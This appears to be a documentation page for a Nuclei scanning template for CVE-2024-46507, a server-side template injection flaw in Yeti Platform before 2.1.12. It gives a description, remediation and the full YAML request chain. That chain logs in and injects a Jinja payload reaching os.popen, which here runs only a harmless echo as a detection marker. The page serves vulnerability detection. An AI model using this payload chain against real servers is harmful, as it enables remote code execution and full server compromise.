Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
ID: CVE-2024-46507
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,yeti,platform,ssti,rce,intrusive
Description
Section titled “Description”The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.
YAML Source
Section titled “YAML Source”id: CVE-2024-46507
info: name: Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE author: iamnoooob,rootxharsh,pdresearch severity: high description: | The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution. impact: | Successful exploitation enables an attacker to execute arbitrary system commands, potentially leading to full server compromise. remediation: | Upgrade to Yeti Platform 2.1.12 or later to mitigate this vulnerability. reference: - https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/ metadata: shodan-query: html:"Yeti</title>" verified: true max-request: 4 tags: cve,cve2024,yeti,platform,ssti,rce,intrusive
variables: username: "{{username}}" password: "{{password}}"
http: - raw: - | POST /api/v2/auth/token HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n
------WebKitFormBoundaryodI9qNm7xBZLCq9n Content-Disposition: form-data; name="username"
{{username}} ------WebKitFormBoundaryodI9qNm7xBZLCq9n Content-Disposition: form-data; name="password"
{{password}} ------WebKitFormBoundaryodI9qNm7xBZLCq9n--
matchers: - type: word part: body words: - access_token internal: true
- raw: - | POST /api/v2/templates/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"template":{"name":"AA","template":"value,tags\n{% for obj in data %}{{obj.value}},{{\";\".join(obj.tags.keys())}}\n{% endfor %}\n\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"echo Q1ZFLTIwMjQtNDY1MDcK | base64 -d\").read()}}{%endif%}{% endfor %}"}}
skip-variables-check: true
extractors: - type: json part: body name: template_id json: - '.id' internal: true
- raw: - | POST /api/v2/observables/extended HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"observable":{"type":"ipv4","value":"1.{{randint(1,255)}}.{{randint(1,255)}}.{{randint(1,255)}}"}}
extractors: - type: json part: body name: observable_id json: - '.id' internal: true
- raw: - | POST /api/v2/templates/render HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"template_id":"{{template_id}}","observable_ids":["{{observable_id}}"],"search_query":""}
matchers: - type: dsl dsl: - 'contains(body, "CVE-2024-46507")' - 'contains(content_type, "text/plain")' - 'status_code == 200' condition: and# digest: 4b0a00483046022100a9f6674b61d9e5ee7a6d82dcb3aabc14f4dc563c151f4147724087fb9bb96c42022100ed237c22d59d36ca5aae7d6bc286135d5045ec53118c3bd8953ff996e599dba5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-46507.yaml"